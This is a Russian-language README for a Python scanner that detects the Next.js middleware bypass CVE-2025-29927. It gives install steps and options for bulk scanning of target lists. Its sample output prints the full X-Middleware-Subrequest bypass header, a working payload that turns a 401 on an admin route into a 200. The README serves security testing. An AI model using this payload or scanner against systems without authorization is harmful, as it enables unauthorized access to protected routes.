
Сканер обхода middleware Next.js
CVE-2025-29927 — это специализированный инструмент безопасности для обнаружения уязвимости обхода middleware в Next.js (CVE-2025-29927), затрагивающей версии Next.js с 11.1.4 по 15.2.2. Эта критическая уязвимость позволяет злоумышленникам обходить средства защиты, отправляя специально сформированный HTTP-заголовок.
Уязвимость обхода middleware в Next.js (CVE-2025-29927) позволяет злоумышленникам обходить механизмы авторизации, отправляя вредоносный заголовок X-Middleware-Subrequest, который сбивает с толку логику обработки middleware. Это может привести к несанкционированному доступу к защищённым ресурсам и маршрутам.
Оценка CVSS: 9.1 (Critical)
# Клонируйте репозиторий
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Установите зависимости
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: Одиночная цель для сканирования (например, example.com или https://example.com)-f, --file: Файл со списком целей (по одной на строку)-c, --concurrency: Количество одновременных сканирований (по умолчанию: 5)-k, --insecure: Отключить проверку SSL-сертификата (полезно для IP-адресов)-s, --silent: Тихий режим — показывать только уязвимые целиСканирование одной цели:
python CVE-2025-29927.py -t example.com
Сканирование нескольких целей из файла:
python CVE-2025-29927.py -f targets.txt
Сканирование с отключённой проверкой SSL:
python CVE-2025-29927.py -t 192.168.1.1 -k
Автоматическое сканирование в тихом режиме:
python CVE-2025-29927.py -f targets.txt -k -s
Сканирование с пользовательским заголовком:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
Для уязвимых целей MiddleWay отображает:
Пример вывода:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Чтобы устранить эту уязвимость:
X-Middleware-Subrequest на уровне WAF или сервераЭтот инструмент предоставляется только для исследований в области безопасности и защитных целей. Всегда получайте надлежащее разрешение перед сканированием любых систем, которые вам не принадлежат. Авторы не несут ответственности за любое неправомерное использование этого инструмента.
MIT